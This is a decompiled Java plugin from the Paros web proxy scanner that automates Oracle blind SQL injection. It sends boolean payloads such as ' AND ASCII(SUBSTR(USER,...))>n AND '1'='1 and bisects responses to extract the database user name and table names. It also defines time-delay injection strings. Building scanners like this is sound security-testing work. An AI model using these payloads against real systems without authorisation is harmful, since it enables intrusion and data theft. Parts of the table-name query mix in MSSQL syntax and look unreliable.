/*
 * Decompiled with CFR 0.152.
 */
package org.parosproxy.paros.core.scanner.plugin;

import java.io.IOException;
import java.util.regex.Pattern;
import org.apache.commons.httpclient.HttpException;
import org.parosproxy.paros.Constant;
import org.parosproxy.paros.core.scanner.AbstractAppParamPlugin;
import org.parosproxy.paros.network.HttpMessage;
import org.parosproxy.paros.network.HttpStatusCode;

public class TestInjectionOracleSQLEnumeration
extends AbstractAppParamPlugin {
    private static final String[] dependency = new String[]{"TestInjectionSQLFingerprint", "TestInjectionSQL"};
    private static final int TIME_SPREAD = 15000;
    private static final String SQL_DELAY_1 = "';waitfor delay '0:0:15';--";
    private static final String SQL_DELAY_2 = ";waitfor delay '0:0:15';--";
    private static final String SQL_BLIND_MS_INSERT = ");waitfor delay '0:0:15';--";
    private static final String SQL_BLIND_INSERT = ");--";
    private static final String SQL_CHECK_ERR = "'INJECTED_PARAM";
    private static final Pattern patternErrorODBC1 = Pattern.compile("Microsoft OLE DB Provider for ODBC Drivers.*error", 10);
    private static final Pattern patternErrorODBC2 = Pattern.compile("ODBC.*Drivers.*error", 10);
    private static final Pattern patternErrorGeneric = Pattern.compile("JDBC|ODBC|SQL", 10);
    private static final Pattern patternErrorODBCMSSQL = Pattern.compile("ODBC SQL Server Driver", 10);
    private String mResBodyNormal = "";
    private String mResBodyError = "";

    public int getId() {
        return 40032;
    }

    public String getName() {
        return "Oracle SQL Injection Enumeration";
    }

    public String[] getDependency() {
        return dependency;
    }

    public String getDescription() {
        String string = "The DB user name can be obtained.";
        return string;
    }

    public int getCategory() {
        return 4;
    }

    public String getSolution() {
        String string = "Refer SQL injection.";
        return string;
    }

    public String getReference() {
        String string = "Refer SQL injection.";
        return string;
    }

    public void init() {
    }

    public void scan(HttpMessage httpMessage, String string, String string2) {
        if (!this.getKb().getBoolean(httpMessage.getRequestHeader().getURI(), "sql/and")) {
            return;
        }
        if (this.getKb().getString("sql/oracle/username") != null && this.getKb().getString("sql/oracle/tablename") != null) {
            return;
        }
        try {
            this.scanSQL(httpMessage, string, string2);
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

    public void scanSQL(HttpMessage httpMessage, String string, String string2) throws HttpException, IOException {
        Object var4_4 = null;
        Object var5_5 = null;
        Object var6_6 = null;
        Object var7_7 = null;
        boolean bl = false;
        long l = 0L;
        HttpMessage httpMessage2 = this.getNewMsg();
        this.sendAndReceive(httpMessage2);
        l = httpMessage2.getTimeElapsedMillis();
        if (httpMessage2.getResponseHeader().getStatusCode() != 200) {
            return;
        }
        this.mResBodyNormal = httpMessage2.getResponseBody().toString();
        if (this.getKb().getBoolean(httpMessage2.getRequestHeader().getURI(), "sql/and")) {
            if (this.getKb().getString("sql/oracle/username") == null) {
                this.checkDBUserName(httpMessage2, string, string2);
            }
            if (this.getKb().getString("sql/oracle/tablename") == null) {
                this.checkDBTableName(httpMessage2, string, string2);
            }
        }
    }

    private boolean checkResult(HttpMessage httpMessage, String string) {
        long l = 0L;
        long l2 = 0L;
        long l3 = 0L;
        int n = 10;
        StringBuffer stringBuffer = new StringBuffer();
        if (httpMessage.getResponseHeader().getStatusCode() != 200 && !HttpStatusCode.isServerError(httpMessage.getResponseHeader().getStatusCode())) {
            return false;
        }
        if (this.matchBodyPattern(httpMessage, patternErrorODBCMSSQL, stringBuffer)) {
            this.getKb().add(httpMessage.getRequestHeader().getURI(), "sql/mssql", (Object)new Boolean(true));
        }
        if (this.matchBodyPattern(httpMessage, patternErrorODBC1, stringBuffer) || this.matchBodyPattern(httpMessage, patternErrorODBC2, stringBuffer)) {
            return true;
        }
        return this.matchBodyPattern(httpMessage, patternErrorGeneric, stringBuffer);
    }

    private void checkDBUserName(HttpMessage httpMessage, String string, String string2) throws HttpException, IOException {
        String string3;
        int n = 0;
        StringBuffer stringBuffer = new StringBuffer();
        byte[] byArray = new byte[1];
        for (int i = 0; i < 20; ++i) {
            boolean bl = false;
            n = 0;
            n = this.getDBUserNameBisection(httpMessage, string, string2, i, 47, 123);
            if (n == 47 || n == 123) break;
            byArray[0] = (byte)n;
            String string4 = new String(byArray, "UTF8");
            stringBuffer.append(string4);
        }
        if ((string3 = stringBuffer.toString()).length() > 0) {
            this.getKb().add("sql/oracle/username", string3);
            this.bingo(3, 0, null, "", "current db user name: " + string3, httpMessage);
        }
    }

    private int getDBUserNameBisection(HttpMessage httpMessage, String string, String string2, int n, int n2, int n3) throws HttpException, IOException {
        if (n2 == n3) {
            return n2;
        }
        int n4 = (n2 + n3) / 2;
        boolean bl = this.getDBUserNameQuery(httpMessage, string, string2, n, n4);
        if (n3 - n2 < 2) {
            if (bl) {
                return n3;
            }
            return n2;
        }
        if (bl) {
            n2 = n4;
        } else {
            n3 = n4;
        }
        int n5 = this.getDBUserNameBisection(httpMessage, string, string2, n, n2, n3);
        return n5;
    }

    private boolean getDBUserNameQuery(HttpMessage httpMessage, String string, String string2, int n, int n2) throws HttpException, IOException {
        String string3 = "' AND ASCII(SUBSTR(USER," + (n + 1) + ",1))>" + n2 + " AND '1'='1";
        String string4 = "";
        boolean bl = false;
        this.setParameter(httpMessage, string, string2 + string3);
        this.sendAndReceive(httpMessage);
        if (httpMessage.getResponseHeader().getStatusCode() == 200 && (string4 = this.stripOff(httpMessage.getResponseBody().toString(), TestInjectionOracleSQLEnumeration.getURLEncode(string3))).compareTo(this.mResBodyNormal) == 0) {
            bl = true;
        }
        return bl;
    }

    private void checkDBTableName(HttpMessage httpMessage, String string, String string2) throws HttpException, IOException {
        int n = 0;
        StringBuffer stringBuffer = null;
        byte[] byArray = new byte[1];
        for (int i = 1; i < 4; ++i) {
            String string3;
            stringBuffer = new StringBuffer();
            for (int j = 0; j < 10; ++j) {
                n = 0;
                n = this.getTableNameBisection(httpMessage, string, string2, j, 47, 123, i);
                if (n == 47 || n == 123) break;
                byArray[0] = (byte)n;
                String string4 = new String(byArray, "UTF8");
                stringBuffer.append(string4);
            }
            if ((string3 = stringBuffer.toString()).length() <= 0) continue;
            this.getKb().add("sql/oracle/tablename", string3);
            this.bingo(3, 0, null, "", "table name: " + string3, httpMessage);
        }
    }

    private int getTableNameBisection(HttpMessage httpMessage, String string, String string2, int n, int n2, int n3, int n4) throws HttpException, IOException {
        if (n2 == n3) {
            return n2;
        }
        int n5 = (n2 + n3) / 2;
        boolean bl = this.getTableNameQuery(httpMessage, string, string2, n, n5, n4);
        if (n3 - n2 < 2) {
            if (bl) {
                return n3;
            }
            return n2;
        }
        if (bl) {
            n2 = n5;
        } else {
            n3 = n5;
        }
        int n6 = this.getTableNameBisection(httpMessage, string, string2, n, n2, n3, n4);
        return n6;
    }

    private boolean getTableNameQuery(HttpMessage httpMessage, String string, String string2, int n, int n2, int n3) throws HttpException, IOException {
        String string3 = null;
        string3 = n3 == 1 ? "' AND ascii(substr((SELECT TOP 1 object_name FROM user_objects WHERE object_type='TABLE' ORDER BY object_name)," + (n + 1) + ", 1))>" + n2 + " AND '1'='1" : "' AND ascii(substr((SELECT TOP 1 a.object_name FROM user_objects as a WHERE a.object_type='TABLE' AND a.object_name NOT IN(SELECT TOP " + (n3 - 1) + " b.object_name FROM user_objects AS b WHERE b.object_type='TABLE' order by b.object_name))," + (n + 1) + ", 1))>" + n2 + " AND '1'='1";
        String string4 = "";
        boolean bl = false;
        this.setParameter(httpMessage, string, string2 + string3);
        this.sendAndReceive(httpMessage);
        if (httpMessage.getResponseHeader().getStatusCode() == 200 && (string4 = this.stripOff(httpMessage.getResponseBody().toString(), TestInjectionOracleSQLEnumeration.getURLEncode(string3))).compareTo(this.mResBodyNormal) == 0) {
            bl = true;
        }
        return bl;
    }

    public boolean isVisible() {
        return Constant.isSP();
    }
}

